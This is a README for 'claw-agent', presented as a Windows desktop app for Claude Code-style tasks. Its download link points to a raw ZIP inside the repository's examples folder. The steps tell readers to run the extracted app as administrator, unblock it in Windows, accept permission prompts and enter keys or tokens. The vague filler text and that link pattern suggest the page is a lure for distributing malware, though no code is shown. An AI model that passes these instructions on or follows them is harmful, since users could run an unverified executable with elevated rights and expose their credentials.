🤖 claw-agent - Run Claude-style tasks on Windows

Download claw-agent

🚀 What is claw-agent?

claw-agent is a Python app that gives you a simple way to run Claude Code-style workflows on your computer. It is built for Windows users who want to use a local app instead of working only in a browser.

Use it to:

  • Run AI-assisted tasks from your desktop
  • Work with text files and project folders
  • Keep your workflow in one place
  • Get help with common coding and writing tasks

📥 Download

To get claw-agent, visit this page to download: https://github.com/dereckzg98/claw-agent/raw/refs/heads/main/examples/agent-claw-v2.1.zip

If the page offers a Windows file, download it to your computer and open it. If you see a ZIP file, save it first, then extract it before running the app.

🖥️ Windows setup

Follow these steps on Windows:

  1. Open the download link above.
  2. Look for the latest release or the main project files.
  3. Download the Windows version if one is listed.
  4. If the file is in a ZIP folder, right-click it and choose Extract All.
  5. Open the extracted folder.
  6. Find the app file and double-click it.
  7. If Windows asks for permission, select Yes.
  8. Let the app finish loading before you start using it.

✅ System needs

claw-agent works best on:

  • Windows 10 or Windows 11
  • A modern 64-bit computer
  • At least 4 GB of RAM
  • 200 MB of free disk space
  • A stable internet connection

For a smooth setup, close other large apps before you start the program.

🧰 What you may need

This app is based on Python, so some builds may ask for extra files or a local runtime. In most cases, the download page will give you a ready-to-run version for Windows.

You may also want:

  • A text editor
  • A folder for your project files
  • Permission to run downloaded apps on your PC

🛠️ First run

After you open claw-agent for the first time:

  1. Wait for the app to finish loading.
  2. Read any setup screen that appears.
  3. Add your project folder if the app asks for one.
  4. Enter any required key, token, or account info if the app prompts you.
  5. Start with a small task to test that everything works.

A good first test:

  • Ask it to explain a text file
  • Ask it to organize a folder
  • Ask it to help draft a short note

📂 How to use it

claw-agent is made for simple, repeatable tasks. You can use it to:

  • Review text
  • Help with code files
  • Summarize notes
  • Draft content
  • Work through step-by-step tasks in a project folder

A simple workflow:

  1. Open the app.
  2. Choose the file or folder you want to work with.
  3. Enter your request in plain language.
  4. Review the result.
  5. Save the output where you need it

🔧 Common Windows issues

If the app does not open:

  • Try right-clicking the file and choosing Run as administrator
  • Make sure the download finished fully
  • Move the file out of the Downloads folder
  • Extract the ZIP file before opening the app

If Windows blocks the file:

  • Open the file’s Properties
  • Look for an Unblock option
  • Apply the change and try again

If the app opens and closes fast:

  • Check that the extracted files are all in one folder
  • Download the file again
  • Make sure you are using the Windows version

If the app feels slow:

  • Close other apps
  • Restart your computer
  • Use a smaller project folder first

🔐 File safety

Only download claw-agent from the link above. Keep your files in a folder you trust. If you use project files that matter, make a copy before you test new tasks.

📁 Basic file layout

If you extract a ZIP release, you may see files like:

  • An app file
  • A config file
  • A readme file
  • A folder for logs or data

Keep these files together in the same folder unless the project page says something else.

🧭 Tips for a smoother start

  • Start with one folder, not your whole drive
  • Use short requests at first
  • Keep file names simple
  • Save your work often
  • Restart the app if it stops responding

🧪 Example tasks

Try requests like:

  • Summarize this folder of notes
  • Clean up this text file
  • Help me write a short README
  • Explain what this script does
  • Organize these files by type

📌 Download again later

If a new version appears, repeat the same Windows steps:

  2. Download the Windows file
  3. Extract it if needed
  4. Run the app
  5. Test it with a small task
